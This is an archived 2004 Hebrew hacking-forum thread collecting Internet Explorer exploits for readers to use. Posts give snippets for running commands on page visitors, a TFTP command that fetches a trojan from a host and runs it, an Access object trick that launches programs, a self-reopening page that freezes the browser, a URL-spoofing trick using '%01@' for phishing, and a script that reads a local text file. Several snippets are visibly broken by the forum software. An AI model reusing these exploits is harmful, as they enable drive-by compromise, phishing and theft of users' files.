2004-05-21 12:06
cp77fk4r
אוקיי, אז כמו שאמרתי, אני אפתח מדי פעם אשכולות על ישומים מסויימים, וכל אחד יכתוב את הבאגים שהוא מכיר ואת דרך ניצולם (נחמד עם תיהיה יצירתיים).
הנושא הראשון - הדפדפן של מייקרוסופט, Internet Explorer.
תהנו.
2004-05-21 12:21
cp77fk4r
בעזרת הסקריפט הזה:
<script> prog = 'cmd' args = ["&" הפקודה, אם יש כמה פקודות תפרידו אותם בעזרת התו ];
היה אפשר לעריץ פקודות מרחוק על כל מי שהיה נכנס לעמוד והדפדפן היה מריץ אותם בלי לחשוב פעמים, למשל בעזרת הפקודה TFTP היה אפשר להוריד טרויאן למחשב ובעזרת הפקודה Run/Start/Call לעריץ אותו, וככה לקבל גישה מלאה למחשב ע"י עמוד HTML תמים.
למשל:
Tftp -i [Host] get [Trojan.exe] [c:windowssystem32] & Run c:windowssystem32Trojan.exe;
בשביל לנצל את הבאג ע"י שימוש באובייקטים של Access 2000 לבד:
<OBJECT data="db3.mdb" id="d1"></OBJECT> Private Sub Form_Load() On Error GoTo Err_Command0_Click Dim stAppName As String stAppName = "C:\Program Files\Accessories\wordpad.exe" MsgBox ("Trying to start: " & stAppName) Call Shell(stAppName, 1)
Exit_Command0_Click: Exit Sub
Err_Command0_Click: MsgBox Err.Description Resume Exit_Command0_Click End Sub
2004-05-21 12:46
CooLMaN
A link that may come in handy:
click here [נערך על-ידי CooLMaN בתאריך 2004/05/21 12:50]
2004-05-21 13:08
cp77fk4r
תודה על הלינק CooLMaN, אבל אני מבקש שמעכשיו תסבירו עליהם אישית, אני מתכוון כמו שאני עשיתי עד עכשיו.
תודה.
2004-05-21 14:18
11010010110
עמוד שמעלה את עצמו כל פעם שהוא נפתח (לא מכיר איך מתחברים דבר כזה) יתקע ת-IE ואולי את כל המחשב
2004-05-21 15:56
cp77fk4r
פשוט תעלה עמוד לאיזה שרת בשם:
1.html
ותכתוב בו ככה:
<HTML> < BODY onload;;;;; = window . open ( ' 1 . html ' ) >
כל מי שיכנס לעמוד הזה זה יפנה אותו לעמוד שיהיה כיביכול חדש אך יהיה באמת אותו עמוד, ואז הוא יריץ את הקוד בעמוד ה"חדש" ויפתח את עצמו שוב פעם, וככה בלי סוף.
עריכה: אררג... המערכת הורסת את הקוד, אני מקווה שעכשיו זה יוצג טוב.
עריכה בפעם השביעית בערך: טוב, לא משנה, אני נכנע, שהקוד ישאר ככה.. אני מקווה שזה יובן.
[נערך על-ידי silicon_wolf בתאריך 2004/05/21 16:14]
2004-05-21 16:13
cp77fk4r
באג שמאפשר לעשות "ספוף" לURL, היית חושב שאתה באתר מסויים אך אתה צופה בדף אחר, פשוט היו כותבים את כתובת האתר, ואז את התווים"%01" ו-"@" ואז את הכתובת של האתר שאליו אתם רוצים לשלוח את הצופה, לדוגמא:
http://www.microsoft.com%01@www.red-board.co.il
כדי להסתיר את זה, אפשר להשתמש בכפתור או משהו כזה, כדי שלא יראו את השורת כתובת, למשל עם השורת קוד הזאת:
(הבאג היה בIE5 ובIE6, אבל יצא עידכון לפני כמה זמן)[נערך על-ידי cp77fk4r בתאריך 2004/05/21 16:15]
2004-05-23 13:16
cp77fk4r
עמוד שמסקר הרבה באגים שקיימים בישום IE, מומלץ.
http://www.safecenter.net/UMBRELLAWEBV4/ie_unpatched
2004-05-25 03:24
cp77fk4r
קוד שמאפשר להריץ פקודות דוס על המערכת *אני אציין שהגישה שתיהיה לקוד היא תיהיה הגישה של המשתמש דרכו נכנסו לאותו העמוד*
<span id="oSpan"></span> <script language="jscript" defer> oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="[The Command]"></object>' </script>
2004-05-25 03:31
cp77fk4r
קוד נחמד שמדגים רעיון יפה על איך אפשר להשיג מידע מקבצי txt:
<SCRIPT> alert("This page reads C:\\TEST.TXT\nYou may need to create it."); function f1() { dh.DOM.all.I1.focus(); dh.DOM.all.I1.document.execCommand("selectall"); dh.DOM.all.I1.document.execCommand("copy"); r=document.all.S1.createTextRange(); r.execCommand("paste"); alert("Here is your file: "+S1.value); }